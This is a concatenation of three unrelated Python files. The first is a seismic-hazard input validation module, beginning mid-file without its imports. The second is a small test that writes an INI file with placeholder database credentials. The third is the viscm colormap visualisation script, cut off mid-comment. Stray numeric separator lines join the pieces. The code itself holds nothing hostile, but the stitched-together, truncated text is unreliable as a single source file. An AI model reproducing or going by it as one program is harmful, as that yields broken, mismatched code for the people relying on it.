name_with_dashes = Regex(r'^[a-zA-Z_][\w\-]*$')
MAX_ID_LENGTH = 100
def simple_id(value):
"""
Check the source id; the only accepted chars are `a-zA-Z0-9_-`
"""
if len(value) > MAX_ID_LENGTH:
raise ValueError('The ID %r is longer than %d character' %
(value, MAX_ID_LENGTH))
if re.match(r'^[\w_\-]+$', value):
return value
raise ValueError(
'Invalid ID %r: the only accepted chars are a-zA-Z0-9_-' % value)
class FloatRange(object):
def __init__(self, minrange, maxrange):
self.minrange = minrange
self.maxrange = maxrange
self.__name__ = 'FloatRange[%s:%s]' % (minrange, maxrange)
def __call__(self, value):
f = float_(value)
if f > self.maxrange:
raise ValueError('%r is bigger than the max, %r' %
(f, self.maxrange))
if f < self.minrange:
raise ValueError('%r is smaller than the min, %r' %
(f, self.minrange))
return f
def not_empty(value):
"""Check that the string is not empty"""
if value == '':
raise ValueError('Got an empty string')
return value
def utf8(value):
r"""
Check that the string is UTF-8. Returns an encode bytestring.
>>> utf8(b'\xe0') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: Not UTF-8: ...
"""
try:
if isinstance(value, bytes):
return value.decode('utf-8')
else:
return value
except:
raise ValueError('Not UTF-8: %r' % value)
def utf8_not_empty(value):
"""Check that the string is UTF-8 and not empty"""
return utf8(not_empty(value))
def namelist(value):
"""
:param value: input string
:returns: list of identifiers separated by whitespace or commas
>>> namelist('a,b')
['a', 'b']
>>> namelist('a1 b_2\t_c')
['a1', 'b_2', '_c']
>>> namelist('a1 b_2 1c')
Traceback (most recent call last):
...
ValueError: List of names containing an invalid name: 1c
"""
names = value.replace(',', ' ').split()
for n in names:
try:
name(n)
except ValueError:
raise ValueError('List of names containing an invalid name:'
' %s' % n)
return names
def float_(value):
"""
:param value: input string
:returns: a floating point number
"""
try:
return float(value)
except:
raise ValueError('%r is not a float' % value)
def nonzero(value):
"""
:param value: input string
:returns: the value unchanged
>>> nonzero('1')
'1'
>>> nonzero('0')
Traceback (most recent call last):
...
ValueError: '0' is zero
"""
if float_(value) == 0:
raise ValueError('%r is zero' % value)
return value
def longitude(value):
"""
:param value: input string
:returns: longitude float, rounded to 5 digits, i.e. 1 meter maximum
>>> longitude('0.123456')
0.12346
"""
lon = round(float_(value), 5)
if lon > 180.:
raise ValueError('longitude %s > 180' % lon)
elif lon < -180.:
raise ValueError('longitude %s < -180' % lon)
return lon
def latitude(value):
"""
:param value: input string
:returns: latitude float, rounded to 5 digits, i.e. 1 meter maximum
>>> latitude('-0.123456')
-0.12346
"""
lat = round(float_(value), 5)
if lat > 90.:
raise ValueError('latitude %s > 90' % lat)
elif lat < -90.:
raise ValueError('latitude %s < -90' % lat)
return lat
def depth(value):
"""
:param value: input string
:returns: float >= 0
"""
dep = float_(value)
if dep < 0:
raise ValueError('depth %s < 0' % dep)
return dep
def lon_lat(value):
"""
:param value: a pair of coordinates
:returns: a tuple (longitude, latitude)
>>> lon_lat('12 14')
(12.0, 14.0)
"""
lon, lat = value.split()
return longitude(lon), latitude(lat)
def lon_lat_iml(value, lon, lat, iml):
"""
Used to convert nodes of the form <node lon="LON" lat="LAT" iml="IML" />
"""
return longitude(lon), latitude(lat), positivefloat(iml)
def coordinates(value):
"""
Convert a non-empty string into a list of lon-lat coordinates
>>> coordinates('')
Traceback (most recent call last):
...
ValueError: Empty list of coordinates: ''
>>> coordinates('1.1 1.2')
[(1.1, 1.2)]
>>> coordinates('1.1 1.2, 2.2 2.3')
[(1.1, 1.2), (2.2, 2.3)]
"""
if not value.strip():
raise ValueError('Empty list of coordinates: %r' % value)
return list(map(lon_lat, value.split(',')))
def wkt_polygon(value):
"""
Convert a string with a comma separated list of coordinates into
a WKT polygon, by closing the ring.
"""
points = ['%s %s' % lon_lat for lon_lat in coordinates(value)]
# close the linear polygon ring by appending the first coord to the end
points.append(points[0])
return 'POLYGON((%s))' % ', '.join(points)
def positiveint(value):
"""
:param value: input string
:returns: positive integer
"""
i = int(not_empty(value))
if i < 0:
raise ValueError('integer %d < 0' % i)
return i
def positivefloat(value):
"""
:param value: input string
:returns: positive float
"""
f = float(not_empty(value))
if f < 0:
raise ValueError('float %s < 0' % f)
return f
def positivefloats(value):
"""
:param value: string of whitespace separated floats
:returns: a list of positive floats
"""
return list(map(positivefloat, value.split()))
_BOOL_DICT = {
'': False,
'0': False,
'1': True,
'false': False,
'true': True,
}
def boolean(value):
"""
:param value: input string such as '0', '1', 'true', 'false'
:returns: boolean
>>> boolean('')
False
>>> boolean('True')
True
>>> boolean('false')
False
>>> boolean('t')
Traceback (most recent call last):
...
ValueError: Not a boolean: t
"""
value = value.strip().lower()
try:
return _BOOL_DICT[value]
except KeyError:
raise ValueError('Not a boolean: %s' % value)
range01 = FloatRange(0, 1)
probability = FloatRange(0, 1)
probability.__name__ = 'probability'
def probabilities(value):
"""
:param value: input string, comma separated or space separated
:returns: a list of probabilities
>>> probabilities('')
[]
>>> probabilities('1')
[1.0]
>>> probabilities('0.1 0.2')
[0.1, 0.2]
>>> probabilities('0.1, 0.2') # commas are ignored
[0.1, 0.2]
"""
return list(map(probability, value.replace(',', ' ').split()))
def decreasing_probabilities(value):
"""
:param value: input string, comma separated or space separated
:returns: a list of decreasing probabilities
>>> decreasing_probabilities('1')
Traceback (most recent call last):
...
ValueError: Not enough probabilities, found '1'
>>> decreasing_probabilities('0.2 0.1')
[0.2, 0.1]
>>> decreasing_probabilities('0.1 0.2')
Traceback (most recent call last):
...
ValueError: The probabilities 0.1 0.2 are not in decreasing order
"""
probs = probabilities(value)
if len(probs) < 2:
raise ValueError('Not enough probabilities, found %r' % value)
elif sorted(probs, reverse=True) != probs:
raise ValueError('The probabilities %s are not in decreasing order'
% value)
return probs
def IML(value, IMT, minIML=None, maxIML=None, imlUnit=None):
"""
Convert a node of the form
<IML IMT="PGA" imlUnit="g" minIML="0.02" maxIML="1.5"/>
into ("PGA", None, 0.02, 1.5) and a node
<IML IMT="MMI" imlUnit="g">7 8 9 10 11</IML>
into ("MMI", [7., 8., 9., 10., 11.], None, None)
"""
imt_str = str(imt.from_string(IMT))
if value:
imls = positivefloats(value)
check_levels(imls, imt_str)
else:
imls = None
min_iml = positivefloat(minIML) if minIML else None
max_iml = positivefloat(maxIML) if maxIML else None
return (imt_str, imls, min_iml, max_iml, imlUnit)
def fragilityparams(value, mean, stddev):
"""
Convert a node of the form <params mean="0.30" stddev="0.16" /> into
a pair (0.30, 0.16)
"""
return positivefloat(mean), positivefloat(stddev)
def intensity_measure_types(value):
"""
:param value: input string
:returns: non-empty list of Intensity Measure Type objects
>>> intensity_measure_types('PGA')
['PGA']
>>> intensity_measure_types('PGA, SA(1.00)')
['PGA', 'SA(1.0)']
>>> intensity_measure_types('SA(0.1), SA(0.10)')
Traceback (most recent call last):
...
ValueError: Duplicated IMTs in SA(0.1), SA(0.10)
"""
imts = []
for chunk in value.split(','):
imts.append(str(imt.from_string(chunk.strip())))
if len(distinct(imts)) < len(imts):
raise ValueError('Duplicated IMTs in %s' % value)
return imts
def check_levels(imls, imt):
"""
Raise a ValueError if the given levels are invalid.
:param imls: a list of intensity measure and levels
:param imt: the intensity measure type
>>> check_levels([0.1, 0.2], 'PGA') # ok
>>> check_levels([0.1], 'PGA')
Traceback (most recent call last):
...
ValueError: Not enough imls for PGA: [0.1]
>>> check_levels([0.2, 0.1], 'PGA')
Traceback (most recent call last):
...
ValueError: The imls for PGA are not sorted: [0.2, 0.1]
>>> check_levels([0.2, 0.2], 'PGA')
Traceback (most recent call last):
...
ValueError: Found duplicated levels for PGA: [0.2, 0.2]
"""
if len(imls) < 2:
raise ValueError('Not enough imls for %s: %s' % (imt, imls))
elif imls != sorted(imls):
raise ValueError('The imls for %s are not sorted: %s' % (imt, imls))
elif len(distinct(imls)) < len(imls):
raise ValueError("Found duplicated levels for %s: %s" % (imt, imls))
def intensity_measure_types_and_levels(value):
"""
:param value: input string
:returns: Intensity Measure Type and Levels dictionary
>>> intensity_measure_types_and_levels('{"SA(0.10)": [0.1, 0.2]}')
{'SA(0.1)': [0.1, 0.2]}
"""
dic = dictionary(value)
for imt_str, imls in dic.items():
norm_imt = str(imt.from_string(imt_str))
if norm_imt != imt_str:
dic[norm_imt] = imls
del dic[imt_str]
check_levels(imls, imt_str) # ValueError if the levels are invalid
return dic
def loss_ratios(value):
"""
:param value: input string
:returns: dictionary loss_type -> loss ratios
>>> loss_ratios('{"structural": [0.1, 0.2]}')
{'structural': [0.1, 0.2]}
"""
dic = dictionary(value)
for lt, ratios in dic.items():
for ratio in ratios:
if not 0 <= ratio <= 1:
raise ValueError('Loss ratio %f for loss_type %s is not in '
'the range [0, 1]' % (ratio, lt))
check_levels(ratios, lt) # ValueError if the levels are invalid
return dic
def dictionary(value):
"""
:param value:
input string corresponding to a literal Python object
:returns:
the Python object
>>> dictionary('')
{}
>>> dictionary('{}')
{}
>>> dictionary('{"a": 1}')
{'a': 1}
>>> dictionary('"vs30_clustering: true"') # an error really done by a user
Traceback (most recent call last):
...
ValueError: '"vs30_clustering: true"' is not a valid Python dictionary
"""
if not value:
return {}
try:
dic = dict(ast.literal_eval(value))
except:
raise ValueError('%r is not a valid Python dictionary' % value)
return dic
# ########################### SOURCES/RUPTURES ############################# #
def mag_scale_rel(value):
"""
:param value:
name of a Magnitude-Scale relationship in hazardlib
:returns:
the corresponding hazardlib object
"""
value = value.strip()
if value not in SCALEREL:
raise ValueError('%r is not a recognized magnitude-scale '
'relationship' % value)
return value
def pmf(value):
"""
Comvert a string into a Probability Mass Function.
:param value:
a sequence of probabilities summing up to 1 (no commas)
:returns:
a list of pairs [(probability, index), ...] with index starting from 0
>>> pmf("0.157 0.843")
[(0.157, 0), (0.843, 1)]
"""
probs = probabilities(value)
if sum(map(Decimal, value.split())) != 1:
raise ValueError('The probabilities %s do not sum up to 1!' % value)
return [(p, i) for i, p in enumerate(probs)]
def check_weights(nodes_with_a_weight):
"""
Ensure that the sum of the values is 1
:param nodes_with_a_weight: a list of Node objects with a weight attribute
"""
weights = [n['weight'] for n in nodes_with_a_weight]
if abs(sum(weights) - 1.) > 1E-12:
raise ValueError('The weights do not sum up to 1!', weights)
return nodes_with_a_weight
def hypo_list(nodes):
"""
:param nodes: a hypoList node with N hypocenter nodes
:returns: a numpy array of shape (N, 3) with strike, dip and weight
"""
check_weights(nodes)
data = []
for node in nodes:
data.append([node['alongStrike'], node['downDip'], node['weight']])
return numpy.array(data, float)
def slip_list(nodes):
"""
:param nodes: a slipList node with N slip nodes
:returns: a numpy array of shape (N, 2) with slip angle and weight
"""
check_weights(nodes)
data = []
for node in nodes:
data.append([slip_range(~node), node['weight']])
return numpy.array(data, float)
def posList(value):
"""
:param value:
a string with the form `lon1 lat1 [depth1] ... lonN latN [depthN]`
without commas, where the depts are optional.
:returns:
a list of floats without other validations
"""
values = value.split()
num_values = len(values)
if num_values % 3 and num_values % 2:
raise ValueError('Wrong number: nor pairs not triplets: %s' % values)
try:
return list(map(float_, values))
except Exception as exc:
raise ValueError('Found a non-float in %s: %s' % (value, exc))
def point2d(value, lon, lat):
"""
This is used to convert nodes of the form
<location lon="LON" lat="LAT" />
:param value: None
:param lon: longitude string
:param lat: latitude string
:returns: a validated pair (lon, lat)
"""
return longitude(lon), latitude(lat)
def point3d(value, lon, lat, depth):
"""
This is used to convert nodes of the form
<hypocenter lon="LON" lat="LAT" depth="DEPTH"/>
:param value: None
:param lon: longitude string
:param lat: latitude string
:returns: a validated triple (lon, lat, depth)
"""
return longitude(lon), latitude(lat), positivefloat(depth)
def probability_depth(value, probability, depth):
"""
This is used to convert nodes of the form
<hypoDepth probability="PROB" depth="DEPTH" />
:param value: None
:param probability: a probability
:param depth: a depth
:returns: a validated pair (probability, depth)
"""
return (range01(probability), positivefloat(depth))
strike_range = FloatRange(0, 360)
slip_range = strike_range
dip_range = FloatRange(0, 90)
rake_range = FloatRange(-180, 180)
def nodal_plane(value, probability, strike, dip, rake):
"""
This is used to convert nodes of the form
<nodalPlane probability="0.3" strike="0.0" dip="90.0" rake="0.0" />
:param value: None
:param probability: a probability
:param strike: strike angle
:param dip: dip parameter
:param rake: rake angle
:returns: a validated pair (probability, depth)
"""
return (range01(probability), strike_range(strike),
dip_range(dip), rake_range(rake))
def ab_values(value):
"""
a and b values of the GR magniture-scaling relation.
a is a positive float, b is just a float.
"""
a, b = value.split()
return positivefloat(a), float_(b)
# ############################## site model ################################ #
vs30_type = ChoiceCI('measured', 'inferred')
SiteParam = collections.namedtuple(
'SiteParam', 'z1pt0 z2pt5 measured vs30 lon lat backarc'.split())
def site_param(z1pt0, z2pt5, vs30Type, vs30, lon, lat, backarc="false"):
"""
Used to convert a node like
<site lon="24.7125" lat="42.779167" vs30="462" vs30Type="inferred"
z1pt0="100" z2pt5="5" backarc="False"/>
into a 7-tuple (z1pt0, z2pt5, measured, vs30, backarc, lon, lat)
"""
return SiteParam(positivefloat(z1pt0), positivefloat(z2pt5),
vs30_type(vs30Type) == 'measured',
positivefloat(vs30), longitude(lon),
latitude(lat), boolean(backarc))
###########################################################################
class Param(object):
"""
A descriptor for validated parameters with a default, to be
used as attributes in ParamSet objects.
:param validator: the validator
:param default: the default value
"""
NODEFAULT = object()
def __init__(self, validator, default=NODEFAULT, name=None):
if not callable(validator):
raise ValueError(
'%r for %s is not a validator: it is not callable'
% (validator, name))
if not hasattr(validator, '__name__'):
raise ValueError(
'%r for %s is not a validator: it has no __name__'
% (validator, name))
self.validator = validator
self.default = default
self.name = name # set by ParamSet.__metaclass__
def __get__(self, obj, objclass):
if obj is not None:
if self.default is self.NODEFAULT:
raise AttributeError(self.name)
return self.default
return self
class MetaParamSet(type):
"""
Set the `.name` attribute of every Param instance defined inside
any subclass of ParamSet.
"""
def __init__(cls, name, bases, dic):
for name, val in dic.items():
if isinstance(val, Param):
val.name = name
# used in commonlib.oqvalidation
class ParamSet(with_metaclass(MetaParamSet)):
"""
A set of valid interrelated parameters. Here is an example
of usage:
>>> class MyParams(ParamSet):
... a = Param(positiveint)
... b = Param(positivefloat)
...
... def is_valid_not_too_big(self):
... "The sum of a and b must be under 10. "
... return self.a + self.b < 10
>>> mp = MyParams(a='1', b='7.2')
>>> mp
<MyParams a=1, b=7.2>
>>> MyParams(a='1', b='9.2').validate()
Traceback (most recent call last):
...
ValueError: The sum of a and b must be under 10.
Got:
a=1
b=9.2
The constrains are applied in lexicographic order. The attribute
corresponding to a Param descriptor can be set as usual:
>>> mp.a = '2'
>>> mp.a
'2'
A list with the literal strings can be extracted as follows:
>>> mp.to_params()
[('a', "'2'"), ('b', '7.2')]
It is possible to build a new object from a dictionary of parameters
which are assumed to be already validated:
>>> MyParams.from_(dict(a="'2'", b='7.2'))
<MyParams a='2', b=7.2>
"""
params = {}
@classmethod
def from_(cls, dic):
"""
Build a new ParamSet from a dictionary of string-valued parameters
which are assumed to be already valid.
"""
self = cls.__new__(cls)
for k, v in dic.items():
setattr(self, k, ast.literal_eval(v))
return self
def to_params(self):
"""
Convert the instance dictionary into a sorted list of pairs
(name, valrepr) where valrepr is the string representation of
the underlying value.
"""
dic = self.__dict__
return [(k, repr(dic[k])) for k in sorted(dic)]
def __init__(self, **names_vals):
for name, val in names_vals.items():
if name.startswith(('_', 'is_valid_')):
raise NameError('The parameter name %s is not acceptable'
% name)
try:
convert = getattr(self.__class__, name).validator
except AttributeError:
logging.warn('The parameter %r is unknown, ignoring' % name)
continue
try:
value = convert(val)
except Exception as exc:
raise ValueError('%s: could not convert to %s: %s=%s'
% (exc, convert.__name__, name, val))
setattr(self, name, value)
def validate(self):
"""
Apply the `is_valid` methods to self and possibly raise a ValueError.
"""
# it is important to have the validator applied in a fixed order
valids = [getattr(self, valid)
for valid in sorted(dir(self.__class__))
if valid.startswith('is_valid_')]
for is_valid in valids:
if not is_valid():
dump = '\n'.join('%s=%s' % (n, v)
for n, v in sorted(self.__dict__.items()))
docstring = is_valid.__doc__.strip()
doc = textwrap.fill(docstring.format(**vars(self)))
raise ValueError(doc + '\nGot:\n' + dump)
def __iter__(self):
for item in sorted(vars(self).items()):
yield item
def __repr__(self):
names = sorted(n for n in vars(self) if not n.startswith('_'))
nameval = ', '.join('%s=%r' % (n, getattr(self, n)) for n in names)
return '<%s %s>' % (self.__class__.__name__, nameval)
| 0.000226 |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Nov 21, 2011.
"""
from everest.testing import EverestIni
from everest.testing import Pep8CompliantTestCase
from shutil import rmtree
from tempfile import mkdtemp
from tempfile import mktemp
from everest.compat import open_text
__docformat__ = 'reStructuredText en'
__all__ = []
INI = """\
[DEFAULT]
db_server = my_db_server
db_port = 5432
db_user = my_db_user
db_password = pwd123
db_name = my_db_name
[app:mysimple_app]
db_string = postgresql://%(db_user)s:%(db_password)s@%(db_server)s:%(db_port)s/%(db_name)s
db_echo = false
"""
class TestingTestCase(Pep8CompliantTestCase):
ini_section_name = 'app:mysimple_app'
def set_up(self):
self.__testdir = mkdtemp()
fn = mktemp(suffix="ini", dir=self.__testdir)
ini_file = open_text(fn)
ini_file.write(INI)
ini_file.close()
self.ini_file_path = fn
def tear_down(self):
rmtree(self.__testdir)
def test_ini_file_read(self):
ini = EverestIni(self.ini_file_path)
ini_marker = self.ini_section_name
db_string = ini.get_setting(ini_marker, 'db_string')
self.assert_equal(
db_string,
'postgresql://my_db_user:pwd123@my_db_server:5432/my_db_name')
| 0.001465 |
# This file is part of viscm
# Copyright (C) 2015 Nathaniel Smith <[email protected]>
# Copyright (C) 2015 Stefan van der Walt <[email protected]>
# See file LICENSE.txt for license information.
# Simple script using CIECAM02 and CAM02-UCS to visualize properties of a
# matplotlib colormap
import sys
import os.path
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d
from matplotlib.gridspec import GridSpec
from matplotlib.widgets import Button, Slider
import matplotlib.colors
from matplotlib.colors import LinearSegmentedColormap
from colorspacious import cspace_converter
from .minimvc import Trigger
# Our preferred space (mostly here so we can easily tweak it when curious)
UNIFORM_SPACE = "CAM02-UCS"
GREYSCALE_CONVERSION_SPACE = "JCh"
_sRGB1_to_JCh = cspace_converter("sRGB1", GREYSCALE_CONVERSION_SPACE)
_JCh_to_sRGB1 = cspace_converter(GREYSCALE_CONVERSION_SPACE, "sRGB1")
def to_greyscale(sRGB1):
JCh = _sRGB1_to_JCh(sRGB1)
JCh[..., 1] = 0
return _JCh_to_sRGB1(JCh)
_sRGB1_to_uniform = cspace_converter("sRGB1", UNIFORM_SPACE)
_uniform_to_sRGB1 = cspace_converter(UNIFORM_SPACE, "sRGB1")
_deuter50_space = {"name": "sRGB1+CVD",
"cvd_type": "deuteranomaly",
"severity": 50}
_deuter50_to_sRGB1 = cspace_converter(_deuter50_space, "sRGB1")
_deuter100_space = {"name": "sRGB1+CVD",
"cvd_type": "deuteranomaly",
"severity": 100}
_deuter100_to_sRGB1 = cspace_converter(_deuter100_space, "sRGB1")
_prot50_space = {"name": "sRGB1+CVD",
"cvd_type": "protanomaly",
"severity": 50}
_prot50_to_sRGB1 = cspace_converter(_prot50_space, "sRGB1")
_prot100_space = {"name": "sRGB1+CVD",
"cvd_type": "protanomaly",
"severity": 100}
_prot100_to_sRGB1 = cspace_converter(_prot100_space, "sRGB1")
def _show_cmap(ax, rgb):
ax.imshow(rgb[np.newaxis, ...], aspect="auto")
def _apply_rgb_mat(mat, rgb):
return np.clip(np.einsum("...ij,...j->...i", mat, rgb), 0, 1)
# sRGB corners: a' goes from -37.4 to 45
AP_LIM = (-38, 46)
# b' goes from -46.5 to 42
BP_LIM = (-47, 43)
# J'/K goes from 0 to 100
JP_LIM = (-1, 101)
def _setup_Jpapbp_axis(ax):
ax.set_xlabel("a' (green -> red)")
ax.set_ylabel("b' (blue -> yellow)")
ax.set_zlabel("J'/K (white -> black)")
ax.set_xlim(*AP_LIM)
ax.set_ylim(*BP_LIM)
ax.set_zlim(*JP_LIM)
# Adapt a matplotlib colormap to a linearly transformed version -- useful for
# visualizing how colormaps look given color deficiency.
# Kinda a hack, b/c we inherit from Colormap (this is required), but then
# ignore its implementation entirely.
class TransformedCMap(matplotlib.colors.Colormap):
def __init__(self, transform, base_cmap):
self.transform = transform
self.base_cmap = base_cmap
def __call__(self, *args, **kwargs):
fx = self.base_cmap(*args, **kwargs)
tfx = self.transform(fx)
return tfx
def set_bad(self, *args, **kwargs):
self.base_cmap.set_bad(*args, **kwargs)
def set_under(self, *args, **kwargs):
self.base_cmap.set_under(*args, **kwargs)
def set_over(self, *args, **kwargs):
self.base_cmap.set_over(*args, **kwargs)
def is_gray(self):
return False
def _vis_axes():
grid = GridSpec(10, 4,
left=0.02,
right=0.98,
bottom=0.02,
width_ratios=[1] * 4,
height_ratios=[1] * 10)
axes = {'cmap': grid[0, 0],
'deltas': grid[1:4, 0],
'cmap-greyscale': grid[0, 1],
'lightness-deltas': grid[1:4, 1],
'deuteranomaly': grid[4, 0],
'deuteranopia': grid[5, 0],
'protanomaly': grid[4, 1],
'protanopia': grid[5, 1],
# 'lightness': grid[4:6, 1],
# 'colourfulness': grid[4:6, 2],
# 'hue': grid[4:6, 3],
'image0': grid[0:3, 2],
'image0-cb': grid[0:3, 3],
'image1': grid[3:7, 2],
'image1-cb': grid[3:7, 3],
'image2': grid[7:, 2],
'image2-cb': grid[7:, 3],
}
axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()])
axes['gamut'] = plt.subplot(grid[6:, :2], projection='3d')
axes['gamut-toggle'] = plt.axes([0.01, 0.01, 0.08, 0.025])
return axes
# N=256 matches the default quantization for LinearSegmentedColormap, which
# reduces quantization/aliasing artifacts (esp. in the perceptual deltas
# plot).
class viscm(object):
def __init__(self, cm, name=None, N=256, N_dots=50, show_gamut=False):
if isinstance(cm, str):
cm = plt.get_cmap(cm)
if name is None:
name = cm.name
self.fig = plt.figure()
self.fig.suptitle("Colormap evaluation: %s" % (name,), fontsize=24)
axes = _vis_axes()
x = np.linspace(0, 1, N)
x_dots = np.linspace(0, 1, N_dots)
RGB = cm(x)[:, :3]
RGB_dots = cm(x_dots)[:, :3]
ax = axes['cmap']
_show_cmap(ax, RGB)
ax.set_title("The colormap in its glory")
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
def label(ax, s):
ax.text(0.95, 0.05, s,
horizontalalignment="right",
verticalalignment="bottom",
transform=ax.transAxes)
Jpapbp = _sRGB1_to_uniform(RGB)
ax = axes['deltas']
local_deltas = N * np.sqrt(np.sum((Jpapbp[:-1, :] - Jpapbp[1:, :]) ** 2, axis=-1))
ax.plot(x[1:], local_deltas)
arclength = np.sum(local_deltas) / N
label(ax, "Perceptual deltas (total: %0.2f)" % (arclength,))
ax.set_ylim(0, ax.get_ylim()[1])
ax.get_xaxis().set_visible(False)
ax = axes['cmap-greyscale']
_show_cmap(ax, to_greyscale(RGB))
ax.set_title("Black-and-white printed")
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax = axes['lightness-deltas']
ax.axhline(0, linestyle="--", color="grey")
lightness_deltas = N * np.diff(Jpapbp[:, 0])
ax.plot(x[1:], lightness_deltas)
label(ax,
"Perceptual lightness deltas (total: %0.2f)"
% (np.sum(np.abs(lightness_deltas)) / N,))
#ax.set_ylim(0, ax.get_ylim()[1])
ax.get_xaxis().set_visible(False)
# ax = axes['lightness']
# ax.plot(x, ciecam02.J)
# label(ax, "Lightness (J)")
# ax.set_ylim(0, 105)
# ax = axes['colourfulness']
# ax.plot(x, ciecam02.M)
# label(ax, "Colourfulness (M)")
# ax = axes['hue']
# ax.plot(x, ciecam02.h)
# label(ax, "Hue angle (h)")
# ax.set_ylim(0, 360)
def anom(ax, converter, name):
_show_cmap(ax, np.clip(converter(RGB), 0, 1))
label(ax, name)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
anom(axes['deuteranomaly'],
_deuter50_to_sRGB1,
"Moderate deuteranomaly")
anom(axes['deuteranopia'],
_deuter100_to_sRGB1,
"Complete deuteranopia")
anom(axes['protanomaly'],
_prot50_to_sRGB1,
"Moderate protanomaly")
anom(axes['protanopia'],
_prot100_to_sRGB1,
"Complete protanopia")
ax = axes['gamut']
ax.plot(Jpapbp[:, 1], Jpapbp[:, 2], Jpapbp[:, 0])
Jpapbp_dots = _sRGB1_to_uniform(RGB_dots)
ax.scatter(Jpapbp_dots[:, 1],
Jpapbp_dots[:, 2],
Jpapbp_dots[:, 0],
c=RGB_dots[:, :],
s=80)
# Draw a wireframe indicating the sRGB gamut
self.gamut_patch = sRGB_gamut_patch()
# That function returns a patch where each face is colored to match
# the represented colors. For present purposes we want something
# less... colorful.
self.gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1])
self.gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1])
ax.add_collection3d(self.gamut_patch)
self.gamut_patch.set_visible(show_gamut)
ax.view_init(elev=75, azim=-75)
self.gamut_patch_toggle = Button(axes['gamut-toggle'], "Toggle gamut")
def toggle(*args):
self.gamut_patch.set_visible(not self.gamut_patch.get_visible())
plt.draw()
self.gamut_patch_toggle.on_clicked(toggle)
_setup_Jpapbp_axis(ax)
images = []
image_args = []
example_dir = os.path.join(os.path.dirname(__file__), "examples")
images.append(np.loadtxt(os.path.join(example_dir, "hist2d.txt")))
image_args.append({"aspect": "equal",
"origin": "lower",
"interpolation": "nearest",
"vmin": 0})
images.append(np.loadtxt(os.path.join(example_dir,
"st-helens_before-modified.txt.gz")).T)
image_args.append({})
# Adapted from http://matplotlib.org/mpl_examples/images_contours_and_fields/pcolormesh_levels.py
dx = dy = 0.05
y, x = np.mgrid[-5 : 5 + dy : dy, -5 : 10 + dx : dx]
z = np.sin(x) ** 10 + np.cos(10 + y * x) + np.cos(x) + 0.2 * y + 0.1 * x
images.append(z)
image_args.append({})
def _deuter_transform(RGBA):
# clipping, alpha handling
RGB = RGBA[..., :3]
RGB = np.clip(_deuter50_to_sRGB1(RGB), 0, 1)
return np.concatenate((RGB, RGBA[..., 3:]), axis=-1)
deuter_cm = TransformedCMap(_deuter_transform, cm)
for i, (image, args) in enumerate(zip(images, image_args)):
ax = axes['image%i' % (i,)]
ax.imshow(image, cmap=cm, **args)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax_cb = axes['image%i-cb' % (i,)]
ax_cb.imshow(image, cmap=deuter_cm, **args)
ax_cb.get_xaxis().set_visible(False)
ax_cb.get_yaxis().set_visible(False)
axes['image0'].set_title("Sample images")
axes['image0-cb'].set_title("Moderate deuter.")
def sRGB_gamut_patch(resolution=20):
step = 1.0 / resolution
sRGB_quads = []
sRGB_values = []
# each entry in 'quads' is a 4x3 array where each row contains the
# coordinates of a corner point
for fixed in 0, 1:
for i in range(resolution):
for j in range(resolution):
# R quad
sRGB_quads.append([[fixed, i * step, j * step],
[fixed, (i+1) * step, j * step],
[fixed, (i+1) * step, (j+1) * step],
[fixed, i * step, (j+1) * step]])
sRGB_values.append((fixed, (i + 0.5) * step, (j + 0.5) * step,
1))
# G quad
sRGB_quads.append([[i * step, fixed, j * step],
[(i+1) * step, fixed, j * step],
[(i+1) * step, fixed, (j+1) * step],
[i * step, fixed, (j+1) * step]])
sRGB_values.append(((i + 0.5) * step, fixed, (j + 0.5) * step,
1))
# B quad
sRGB_quads.append([[i * step, j * step, fixed],
[(i+1) * step, j * step, fixed],
[(i+1) * step, (j+1) * step, fixed],
[i * step, (j+1) * step, fixed]])
sRGB_values.append(((i + 0.5) * step, (j + 0.5) * step, fixed,
1))
sRGB_quads = np.asarray(sRGB_quads)
# work around colorspace transform bugginess in handling high-dim
# arrays
sRGB_quads_2d = sRGB_quads.reshape((-1, 3))
Jpapbp_quads_2d = _sRGB1_to_uniform(sRGB_quads_2d)
Jpapbp_quads = Jpapbp_quads_2d.reshape((-1, 4, 3))
gamut_patch = mpl_toolkits.mplot3d.art3d.Poly3DCollection(
Jpapbp_quads[:, :, [1, 2, 0]])
gamut_patch.set_facecolor(sRGB_values)
gamut_patch.set_edgecolor(sRGB_values)
return gamut_patch
def sRGB_gamut_Jp_slice(Jp,
ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200):
bp_grid, ap_grid = np.mgrid[bp_lim[0] : bp_lim[1] : resolution * 1j,
ap_lim[0] : ap_lim[1] : resolution * 1j]
Jp_grid = Jp * np.ones((resolution, resolution))
Jpapbp = np.concatenate((Jp_grid[:, :, np.newaxis],
ap_grid[:, :, np.newaxis],
bp_grid[:, :, np.newaxis]),
axis=2)
sRGB = _uniform_to_sRGB1(Jpapbp)
sRGBA = np.concatenate((sRGB, np.ones(sRGB.shape[:2] + (1,))),
axis=2)
sRGBA[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = [0, 0, 0, 0]
return sRGBA
def draw_pure_hue_angles(ax):
# Pure hue angles from CIECAM-02
for color, angle in [("r", 20.14),
("y", 90.00),
("g", 164.25),
("b", 237.53)]:
x = np.cos(np.deg2rad(angle))
y = np.sin(np.deg2rad(angle))
ax.plot([0, x * 1000], [0, y * 1000], color + "--")
def draw_sRGB_gamut_Jp_slice(ax, Jp, ap_lim=(-50, 50), bp_lim=(-50, 50),
**kwargs):
sRGB = sRGB_gamut_Jp_slice(Jp, ap_lim=ap_lim, bp_lim=bp_lim, **kwargs)
im = ax.imshow(sRGB, aspect="equal",
extent=ap_lim + bp_lim, origin="lower")
draw_pure_hue_angles(ax)
ax.set_xlim(ap_lim)
ax.set_ylim(bp_lim)
return im
# def sRGB_gamut_J_slice(J,
# ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200):
# a_grid, b_grid = np.mgrid[ap_lim[0] : ap_lim[1] : resolution * 1j,
